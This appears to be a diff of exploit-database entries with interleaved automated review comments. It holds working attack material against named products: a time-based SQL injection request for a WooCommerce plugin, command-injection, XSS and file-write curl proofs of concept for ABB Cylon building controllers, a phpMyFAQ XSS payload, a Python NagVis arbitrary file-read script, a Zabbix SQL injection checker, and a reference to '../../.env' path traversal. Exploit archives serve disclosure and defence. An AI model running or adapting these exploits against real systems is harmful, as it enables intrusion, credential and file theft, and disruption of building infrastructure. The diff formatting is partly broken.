~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
EOF Steffen Rogge / @2022
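Review bot: in the quoted `actionStream()` the `log` parameter is read twice (`getParam('log')`, then `get('log', $logFile)` with the first value as the default), which is redundant but harmless; the actual defect is that the value is concatenated onto `$logsDir` and handed to `file_get_contents` with no `basename()` call and no check that the resolved path still lies under `@storage/logs`, which is what the `../../.env` request exploits. The Solution section only links the 3.0.4 commit and never says what the fix does, so a reader cannot judge whether it applies `basename()`, a `realpath()` prefix check, or an allow-list of existing log files; one sentence describing the patched check would let an operator verify it on their own install. The `Advisory URL` should also point at this advisory's own page rather than the generic vulnerability-lab index, and the "{MD5}_identity" cookie note would be clearer if it said the MD5 prefix is instance-specific, as the capture's `1031b8c4..._identity` shows.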
91
exploits/multiple/webapps/52248.txt
Normal file
@ -0,0 +1,91 @@
# Exploit Title: WooCommerce Customers Manager 29.4 - Post-Authenticated SQL Injection
# Date: 2024-03-25
# Exploit Author: Ivan Spiridonov - xbz0n
# Software Link: https://codecanyon.net/item/woocommerce-customers-manager/10965432
# Version: 29.4
# Tested on: Ubuntu 22.04
# CVE: CVE-2024-0399

## SQL Injection

The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to an SQL injection exploitable by Subscriber+ role.

## Affected Components

- **Plugin:** WooCommerce Customers Manager
- **Version:** 29.4
- **Affected Parameters:** 'max_amount', 'max_amount_total', 'min_amount', 'min_amount_total'
- **Affected Endpoint:** /wp-admin/admin-ajax.php

## Description

The vulnerability is located within the transaction amount parameters like 'max_amount', 'max_amount_total', 'min_amount', and 'min_amount_total' used in the admin AJAX endpoint. By injecting SQL commands into these parameters, authenticated attackers can manipulate SQL queries leading to a time-based SQL Injection vulnerability.

## Proof of Concept

### Manual Exploitation

```http
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://localhost/wp-admin/admin.php?page=wccm-discover-customer
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------2461714219322283440478088295
Content-Length: 1877
Origin: http://localhost
Connection: close
Cookie: Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------2461714219322283440478088295
Content-Disposition: form-data; name="action"
wccm_get_orders_tot_num
-----------------------------2461714219322283440478088295
Content-Disposition: form-data; name="start_date"
2024-01-09
|
||||
-----------------------------2461714219322283440478088295
|
||||
Content-Disposition: form-data; name="end_date"
|
||||
2024-01-11
|
||||
-----------------------------2461714219322283440478088295
|
||||
Content-Disposition: form-data; name="customer_ids"
|
||||
-----------------------------2461714219322283440478088295
|
||||
Content-Disposition: form-data; name="product_ids"
|
||||
-----------------------------2461714219322283440478088295
|
||||
Content-Disposition: form-data; name="category_ids"
|
||||
-----------------------------2461714219322283440478088295
|
||||
Content-Disposition: form-data; name="min_amount"
|
||||
0
|
||||
-----------------------------2461714219322283440478088295
|
||||
Content-Disposition: form-data; name="max_amount"
|
||||
0
|
||||
-----------------------------2461714219322283440478088295
|
||||
Content-Disposition: form-data; name="min_amount_total"
|
||||
0
|
||||
-----------------------------2461714219322283440478088295
|
||||
Content-Disposition: form-data; name="max_amount_total"
|
||||
(select*from(select(sleep(20)))a)
|
||||
-----------------------------2461714219322283440478088295
|
||||
Content-Disposition: form-data; name="product_relationship"
|
||||
or
|
||||
-----------------------------2461714219322283440478088295
|
||||
Content-Disposition: form-data; name="product_category_relationship"
|
||||
or
|
||||
-----------------------------2461714219322283440478088295
|
||||
Content-Disposition: form-data; name="product_category_filters_relationship"
|
||||
and
|
||||
-----------------------------2461714219322283440478088295
|
||||
Content-Disposition: form-data; name="statuses"
|
||||
wc-pending,wc-processing,wc-on-hold,wc-completed,wc-cancelled,wc-refunded,wc-failed,wc-checkout-draft
|
||||
-----------------------------2461714219322283440478088295--
|
||||
```
|
||||
|
||||
If the server response is delayed by approximately 20 seconds, it indicates a successful exploitation of the time-based SQL Injection, confirming the vulnerability.
|
||||
|
||||
## Recommendations
|
||||
|
||||
Users of WooCommerce Customers Manager v29.4 are strongly advised to restrict access to the affected endpoint and update the plugin as soon as a fixed version is released. This advisory serves as a notice to all users of Smart Manager v8.27.0 to take immediate action in updating their plugin to protect against this SQL Injection vulnerability.
|
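Review bot: the Recommendations paragraph at the end of the hunk tells "all users of Smart Manager v8.27.0" to update, but this advisory is for WooCommerce Customers Manager 29.4 (Smart Manager is the subject of 52247.txt in this same commit); the sentence was carried over from the other writeup and should be corrected or dropped. In the request, the line "Cookie: Sec-Fetch-Dest: empty" shows that the session cookie was redacted by deleting its value, which folded the next header into it; restore it as two lines, "Cookie: <Subscriber+ session cookie>" and "Sec-Fetch-Dest: empty", since the Subscriber+ session is the precondition the body states. "Content-Length: 1877" no longer matches the body shown and can be omitted. The title says only "Post-Authenticated" while the body says "exploitable by Subscriber+ role"; naming the minimum role in the title helps triage.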
79
exploits/php/hardware/52232.txt
Normal file
|
@ -0,0 +1,79 @@
|
|||
# Exploit title : ABB Cylon Aspect 4.00.00 (factorySetSerialNum.php) Remote Code Execution
|
||||
# Vendor: ABB Ltd.
|
||||
# Product web page: https://www.global.abb
|
||||
# Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
|
||||
Firmware: <=4.00.00
|
||||
|
||||
Summary: ASPECT is an award-winning scalable building energy management
|
||||
and control solution designed to allow users seamless access to their
|
||||
building data through standard building protocols including smart devices.
|
||||
|
||||
Desc: The ABB Cylon Aspect BMS/BAS controller suffers from an unauthenticated
|
||||
blind command injection vulnerability. Input passed to the serial and ManufactureDate
|
||||
POST parameters is not properly sanitized, allowing attackers to execute arbitrary
|
||||
shell commands on the system. While factory test scripts included in the upgrade
|
||||
bundle are typically deleted, a short window for exploitation exists when the device
|
||||
is in the manufacturing phase.
|
||||
|
||||
Tested on: GNU/Linux 3.15.10 (armv7l)
|
||||
GNU/Linux 3.10.0 (x86_64)
|
||||
GNU/Linux 2.6.32 (x86_64)
|
||||
Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
|
||||
Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
|
||||
PHP/7.3.11
|
||||
PHP/5.6.30
|
||||
PHP/5.4.16
|
||||
PHP/4.4.8
|
||||
PHP/5.3.3
|
||||
AspectFT Automation Application Server
|
||||
lighttpd/1.4.32
|
||||
lighttpd/1.4.18
|
||||
Apache/2.2.15 (CentOS)
|
||||
OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
|
||||
OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
|
||||
ErgoTech MIX Deployment Server 2.0.0
|
||||
|
||||
|
||||
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
||||
@zeroscience
|
||||
|
||||
|
||||
Advisory ID: ZSL-2025-5894
|
||||
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5894.php
|
||||
|
||||
|
||||
21.04.2024
|
||||
|
||||
--
|
||||
|
||||
|
||||
$ cat project
|
||||
|
||||
P R O J E C T
|
||||
|
||||
.|
|
||||
| |
|
||||
|'| ._____
|
||||
___ | | |. |' .---"|
|
||||
_ .-' '-. | | .--'| || | _| |
|
||||
.-'| _.| | || '-__ | | | || |
|
||||
|' | |. | || | | | | || |
|
||||
____| '-' ' "" '-' '-.' '` |____
|
||||
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░
|
||||
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
|
||||
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
|
||||
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
|
||||
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
|
||||
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
|
||||
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
|
||||
░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░
|
||||
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
|
||||
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░
|
||||
░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
|
||||
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
|
||||
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
|
||||
░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░
|
||||
|
||||
|
||||
$ curl http://192.168.73.31/factorySetSerialNum.php \
|
||||
> -d "serial=;sleep 2&ManufactureDate=;sleep 3"
|
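Review bot: the header gives "Advisory ID: ZSL-2025-5894" and a 2025 advisory URL, but the date line reads "21.04.2024"; one of the two is wrong, and the CVE line the other exploit-db entries carry is missing, so the entry cannot be cross-referenced. The title says "Remote Code Execution" while the Desc says "blind command injection" and the PoC only shows a timing probe ("serial=;sleep 2&ManufactureDate=;sleep 3"); keep one impact label and state the delay that was observed so a reader can tell a hit from a slow device. "Firmware: <=4.00.00" and "Summary:" are not written as "# Key:" lines like the header fields above them.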
79
exploits/php/hardware/52233.txt
Normal file
|
@ -0,0 +1,79 @@
|
|||
# Exploit title: ABB Cylon Aspect 4.00.00 (factorySaved.php) Unauthenticated XSS
|
||||
# Vendor: ABB Ltd.
|
||||
# Product web page: https://www.global.abb
|
||||
# Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
|
||||
Firmware: <=4.00.00
|
||||
|
||||
Summary: ASPECT is an award-winning scalable building energy management
|
||||
and control solution designed to allow users seamless access to their
|
||||
building data through standard building protocols including smart devices.
|
||||
|
||||
Desc: The ABB Cylon Aspect BMS/BAS controller suffers from an unauthenticated
|
||||
reflected cross-site scripting vulnerability in the 'title' GET parameter.
|
||||
Input is not properly sanitized before being returned to the user, allowing
|
||||
the execution of arbitrary HTML/JS code in a user's browser session in the
|
||||
context of the affected site. While the factory test scripts included in the
|
||||
upgrade bundle are typically deleted, a short window for exploitation exists
|
||||
when the device is in the manufacturing phase.
|
||||
|
||||
Tested on: GNU/Linux 3.15.10 (armv7l)
|
||||
GNU/Linux 3.10.0 (x86_64)
|
||||
GNU/Linux 2.6.32 (x86_64)
|
||||
Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
|
||||
Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
|
||||
PHP/7.3.11
|
||||
PHP/5.6.30
|
||||
PHP/5.4.16
|
||||
PHP/4.4.8
|
||||
PHP/5.3.3
|
||||
AspectFT Automation Application Server
|
||||
lighttpd/1.4.32
|
||||
lighttpd/1.4.18
|
||||
Apache/2.2.15 (CentOS)
|
||||
OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
|
||||
OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
|
||||
ErgoTech MIX Deployment Server 2.0.0
|
||||
|
||||
|
||||
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
||||
@zeroscience
|
||||
|
||||
|
||||
Advisory ID: ZSL-2025-5893
|
||||
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5893.php
|
||||
|
||||
|
||||
21.04.2024
|
||||
|
||||
--
|
||||
|
||||
|
||||
$ cat project
|
||||
|
||||
P R O J E C T
|
||||
|
||||
.|
|
||||
| |
|
||||
|'| ._____
|
||||
___ | | |. |' .---"|
|
||||
_ .-' '-. | | .--'| || | _| |
|
||||
.-'| _.| | || '-__ | | | || |
|
||||
|' | |. | || | | | | || |
|
||||
____| '-' ' "" '-' '-.' '` |____
|
||||
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░
|
||||
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
|
||||
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
|
||||
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
|
||||
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
|
||||
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
|
||||
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
|
||||
░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░
|
||||
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
|
||||
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░
|
||||
░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
|
||||
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
|
||||
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
|
||||
░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░
|
||||
|
||||
|
||||
$ http://192.168.73.31/factorySaved.php?title=<script>console.log('ZSL')</script>
|
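Review bot: the PoC line "$ http://192.168.73.31/factorySaved.php?title=<script>console.log('ZSL')</script>" is a bare URL after a shell prompt, not a command, and typed as shown a shell would treat "<script>" and "</script>" as redirections; either drop the "$ " and present it as a browser URL or wrap it in a quoted curl call with the payload URL-encoded. Same inconsistency as the sibling entry: "Advisory ID: ZSL-2025-5893" and a 2025 URL against the date "21.04.2024", and no CVE line.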
83
exploits/php/hardware/52234.txt
Normal file
|
@ -0,0 +1,83 @@
|
|||
# Exploit title: ABB Cylon Aspect 3.08.03 (webServerDeviceLabelUpdate.php) File Write DoS
|
||||
# Vendor: ABB Ltd.
|
||||
# Product web page: https://www.global.abb
|
||||
# Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
|
||||
Firmware: <=3.08.03
|
||||
|
||||
Summary: ASPECT is an award-winning scalable building energy management
|
||||
and control solution designed to allow users seamless access to their
|
||||
building data through standard building protocols including smart devices.
|
||||
|
||||
Desc: The ABB Cylon Aspect BMS/BAS controller suffers from an authenticated
|
||||
arbitrary content injection vulnerability in the webServerDeviceLabelUpdate.php
|
||||
script due to a lack of input validation. Authenticated attackers can exploit
|
||||
the 'deviceLabel' POST parameter to write arbitrary content to a fixed file
|
||||
location at /usr/local/aam/etc/deviceLabel, potentially causing a denial of
|
||||
service.
|
||||
|
||||
Tested on: GNU/Linux 3.15.10 (armv7l)
|
||||
GNU/Linux 3.10.0 (x86_64)
|
||||
GNU/Linux 2.6.32 (x86_64)
|
||||
Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
|
||||
Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
|
||||
PHP/7.3.11
|
||||
PHP/5.6.30
|
||||
PHP/5.4.16
|
||||
PHP/4.4.8
|
||||
PHP/5.3.3
|
||||
AspectFT Automation Application Server
|
||||
lighttpd/1.4.32
|
||||
lighttpd/1.4.18
|
||||
Apache/2.2.15 (CentOS)
|
||||
OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
|
||||
OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
|
||||
ErgoTech MIX Deployment Server 2.0.0
|
||||
|
||||
|
||||
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
||||
@zeroscience
|
||||
|
||||
|
||||
Advisory ID: ZSL-2025-5892
|
||||
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5892.php
|
||||
|
||||
|
||||
21.04.2024
|
||||
|
||||
--
|
||||
|
||||
|
||||
$ cat project
|
||||
|
||||
P R O J E C T
|
||||
|
||||
.|
|
||||
| |
|
||||
|'| ._____
|
||||
___ | | |. |' .---"|
|
||||
_ .-' '-. | | .--'| || | _| |
|
||||
.-'| _.| | || '-__ | | | || |
|
||||
|' | |. | || | | | | || |
|
||||
____| '-' ' "" '-' '-.' '` |____
|
||||
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░
|
||||
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
|
||||
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
|
||||
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
|
||||
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
|
||||
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
|
||||
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
|
||||
░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░
|
||||
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
|
||||
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░
|
||||
░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
|
||||
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
|
||||
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
|
||||
░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░
|
||||
|
||||
|
||||
$ curl http://192.168.73.31/webServerDeviceLabelUpdate.php \
|
||||
> -H "Cookie: PHPSESSID=xxx" \
|
||||
> -d "deviceLabel=`printf '%.0sA' {1..10000}`"\
|
||||
> # --data-urlencode "deviceLabel@largecontent.txt"
|
||||
|
||||
$ curl http://192.168.73.31/webServerConfiguration.php | grep AAA
|
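Review bot: the PoC shows the content being written (the grep for "AAA" on webServerConfiguration.php) but nothing that demonstrates the denial of service named in the title; the Desc only says "potentially causing a denial of service", so either show what fails once /usr/local/aam/etc/deviceLabel holds the oversized value or retitle the entry as authenticated content injection. In the curl invocation, `{1..10000}` is a bash brace expansion that POSIX sh does not perform, and the line "> # --data-urlencode "deviceLabel@largecontent.txt"" follows a trailing backslash, so it is syntactically part of the same command and is easy to mistake for a continued argument; put the alternative on its own line after the command. "Cookie: PHPSESSID=xxx" should say it must be an authenticated session, matching the "authenticated" in the Desc.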
28
exploits/php/webapps/52226.txt
Normal file
|
@ -0,0 +1,28 @@
|
|||
# Exploit Title: phpMyFAQ 3.1.7 - Reflected Cross-Site Scripting (XSS)
|
||||
# Date: 2024-10-26
|
||||
# Exploit Author: CodeSecLab
|
||||
# Vendor Homepage: https://github.com/thorsten/phpMyFAQ
|
||||
# Software Link: https://github.com/thorsten/phpMyFAQ
|
||||
# Version: 3.1.7
|
||||
# Tested on: Ubuntu Windows
|
||||
# CVE : CVE-2022-4407
|
||||
|
||||
PoC:
|
||||
Get: http://127.0.0.1/phpmyfaq/admin/index.php?action=\"><script>alert('XSS')</script>
|
||||
|
||||
Details:
|
||||
{
|
||||
"Sink": "phpmyfaq/admin/header.php - HTML attribute in the form action parameter",
|
||||
"Vulnerable Variable": "action",
|
||||
"Source": "phpmyfaq/admin/index.php - Filter::filterInput(INPUT_GET, 'action', FILTER_UNSAFE_RAW)",
|
||||
"Sanitization Mechanisms Before Patch": "None - Input directly used without escaping or encoding in the HTML attribute",
|
||||
"Sink Context Constraints": "HTML attribute context - needs proper escaping to break out of attribute",
|
||||
"Attack Payload": "\"><script>alert('XSS')</script>",
|
||||
"Execution Path Constraints": "The 'action' parameter must be passed via GET or POST without prior sanitization or if it is null, it must be taken from 'redirect-action' parameter unless it equals 'logout'",
|
||||
"Request Parameters": "action",
|
||||
"Request URL": "http://127.0.0.1/phpmyfaq/admin/index.php?action=\"><script>alert('XSS')</script>",
|
||||
"Request Method": "GET",
|
||||
"Final PoC": "http://127.0.0.1/phpmyfaq/admin/index.php?action=\"><script>alert('XSS')</script>"
|
||||
}
|
||||
|
||||
[Replace Your Domain Name]
|
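Review bot: "Tested on: Ubuntu Windows" needs a separator between the two platforms. The Details block names the sink as "phpmyfaq/admin/header.php - HTML attribute in the form action parameter" and the PoC hits admin/index.php, but nothing says whether the value is reflected on the login page (before authentication) or only for a logged-in admin; the "Execution Path Constraints" entry about the "redirect-action" fallback points at the login flow, so state which, since it decides the severity. The closing "[Replace Your Domain Name]" is a leftover template note and should go, and the same PoC URL appears three times ("PoC", "Request URL", "Final PoC"); once is enough.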
74
exploits/php/webapps/52229.py
Executable file
|
@ -0,0 +1,74 @@
|
|||
# Exploit Title: NagVis 1.9.33 - Arbitrary File Read
|
||||
# Date: 03/12/2024
|
||||
# Exploit Author: David Rodríguez a.k.a. xerosec
|
||||
# Vendor Homepage: https://www.nagvis.org/
|
||||
# Software Link: https://www.nagvis.org/downloads/archive
|
||||
# Version: 1.9.33
|
||||
# Tested on: Linux
|
||||
# CVE: CVE-2022-46945
|
||||
|
||||
import requests
|
||||
import argparse
|
||||
import json
|
||||
from urllib.parse import urljoin
|
||||
|
||||
def authenticate(target_url, username, password):
|
||||
url = urljoin(target_url, '/nagvis/frontend/nagvis-js/index.php')
|
||||
headers = {"User-Agent": "Mozilla/5.0", "Content-Type": "application/x-www-form-urlencoded"}
|
||||
data = {"_username": username, "_password": password, "submit": "Login"}
|
||||
|
||||
try:
|
||||
response = requests.post(url, headers=headers, data=data)
|
||||
if response.status_code == 200 and "Set-Cookie" in response.headers:
|
||||
print("[✔] Authentication successful.")
|
||||
return response.headers["Set-Cookie"]
|
||||
print(f"[✘] Authentication failed. Status code: {response.status_code}")
|
||||
except Exception as e:
|
||||
print(f"[✘] Request error: {e}")
|
||||
return None
|
||||
|
||||
def exploit(target_url, session_cookie, file_path):
|
||||
url = urljoin(target_url, '/nagvis/server/core/ajax_handler.php')
|
||||
headers = {"User-Agent": "Mozilla/5.0", "Cookie": session_cookie}
|
||||
params = {"mod": "General", "act": "getHoverUrl", "url[]": f"file://{file_path}"}
|
||||
|
||||
try:
|
||||
response = requests.get(url, headers=headers, params=params)
|
||||
if response.status_code == 200:
|
||||
print("[✔] Exploitation successful. File content:\n")
|
||||
display_file_content(response.text)
|
||||
else:
|
||||
print(f"[✘] Exploitation failed. Status code: {response.status_code}")
|
||||
except Exception as e:
|
||||
print(f"[✘] Request error: {e}")
|
||||
|
||||
def display_file_content(raw_response):
|
||||
try:
|
||||
data = json.loads(raw_response)
|
||||
if isinstance(data, list) and len(data) > 0 and isinstance(data[0], dict) and "code" in data[0]:
|
||||
content = data[0]["code"]
|
||||
# Decodificar escapes de manera segura
|
||||
content = content.encode('utf-8').decode('unicode_escape')
|
||||
print(content.strip())
|
||||
else:
|
||||
print("[✘] Unexpected JSON structure.")
|
||||
except json.JSONDecodeError as jde:
|
||||
print(f"[✘] JSON decoding error: {jde}")
|
||||
except Exception as e:
|
||||
print(f"[✘] Unexpected error during output processing: {e}")
|
||||
|
||||
def main():
|
||||
parser = argparse.ArgumentParser(description="Exploit for CVE-2022-46945 (File Read Vulnerability)")
|
||||
parser.add_argument("-t", "--target", required=True, help="Target base URL (e.g., http://10.0.2.132)")
|
||||
parser.add_argument("-u", "--username", required=True, help="Username for authentication")
|
||||
parser.add_argument("-p", "--password", required=True, help="Password for authentication")
|
||||
parser.add_argument("-f", "--file", required=True, help="File path to read (e.g., /etc/passwd)")
|
||||
|
||||
args = parser.parse_args()
|
||||
|
||||
session_cookie = authenticate(args.target, args.username, args.password)
|
||||
if session_cookie:
|
||||
exploit(args.target, session_cookie, args.file)
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
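Review bot: authenticate() returns response.headers["Set-Cookie"] verbatim, which carries attributes such as Path and HttpOnly, and exploit() then sends that whole string as the Cookie header; use a requests.Session() (or send only the name=value part) so a well-formed cookie goes out. The success test `status_code == 200 and "Set-Cookie" in response.headers` also fails when the login answers with a redirect, because requests follows it and the final page is what gets checked; pass allow_redirects=False or inspect the session's cookie jar instead. In display_file_content, `content.encode('utf-8').decode('unicode_escape')` corrupts any non-ASCII characters in the returned file (json.loads has already undone the JSON escapes), and the comment above it, "Decodificar escapes de manera segura", should be in English like the rest of the file.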
63
exploits/php/webapps/52230.py
Executable file
|
@ -0,0 +1,63 @@
|
|||
# Exploit Title: Zabbix 7.0.0 - SQL Injection
|
||||
# Date: 06/12/2024
|
||||
# Exploit Author: Leandro Dias Barata @m4nb4
|
||||
# Vendor Homepage: https://www.zabbix.com/
|
||||
# Software Link: https://support.zabbix.com/browse/ZBX-25623
|
||||
# Version: 6.0.0 - 6.0.31 / 6.0.32rc1 6.4.0 - 6.4.16 / 6.4.17rc1 7.0.0
|
||||
# Tested on: Kali Linux kali-linux-2024.3
|
||||
# CVE: CVE-2024-42327
|
||||
|
||||
import requests
|
||||
import argparse
|
||||
|
||||
HEADERS = {"Content-Type": "application/json"}
|
||||
|
||||
def main():
|
||||
parser = argparse.ArgumentParser(description="CHECK for CVE-2024-42327")
|
||||
parser.add_argument("-t", "--target", required=True, help="API URL")
|
||||
parser.add_argument("-u", "--username", required=True, help="Username")
|
||||
parser.add_argument("-p", "--password", required=True, help="Password")
|
||||
|
||||
args = parser.parse_args()
|
||||
|
||||
url = f"{args.target.rstrip('/')}/api_jsonrpc.php"
|
||||
|
||||
# Login to get the token
|
||||
login_data = {
|
||||
"jsonrpc": "2.0",
|
||||
"method": "user.login",
|
||||
"params": {"username": args.username, "password": args.password},
|
||||
"id": 1,
|
||||
"auth": None
|
||||
}
|
||||
|
||||
try:
|
||||
login_response = requests.post(url, json=login_data, headers=HEADERS)
|
||||
login_response.raise_for_status()
|
||||
auth_token = login_response.json().get("result")
|
||||
|
||||
# Simple SQLi test
|
||||
data = {
|
||||
"jsonrpc": "2.0",
|
||||
"method": "user.get",
|
||||
"params": {
|
||||
"selectRole": ["roleid", "name", "type", "readonly AND (SELECT(SLEEP(5)))"],
|
||||
"userids": ["1", "2"]
|
||||
},
|
||||
"id": 1,
|
||||
"auth": auth_token
|
||||
}
|
||||
|
||||
test_response = requests.post(url, json=data, headers=HEADERS)
|
||||
test_response.raise_for_status()
|
||||
|
||||
if "error" in test_response.text:
|
||||
print("[-] NOT VULNERABLE.")
|
||||
else:
|
||||
print("[!] VULNERABLE.")
|
||||
|
||||
except requests.RequestException as e:
|
||||
print(f"[!] Request error: {e}")
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
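Review bot: the verdict `if "error" in test_response.text` never measures the delay that the `readonly AND (SELECT(SLEEP(5)))` payload is meant to cause, so the script prints VULNERABLE for any reply without the substring "error" (including a patched server that just ignores the bad selectRole entry) and NOT VULNERABLE for any JSON-RPC error, for example a user lacking rights to call user.get; time the request against a plain user.get call and require a difference close to 5 seconds. `auth_token = login_response.json().get("result")` is None on a failed login, and raise_for_status() does not catch that because a JSON-RPC error still arrives as HTTP 200; check it before reusing it. The "# Version:" line runs three ranges together ("6.0.0 - 6.0.31 / 6.0.32rc1 6.4.0 - 6.4.16 / 6.4.17rc1 7.0.0"); separate them with commas.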
45
exploits/php/webapps/52235.txt
Normal file
|
@ -0,0 +1,45 @@
|
|||
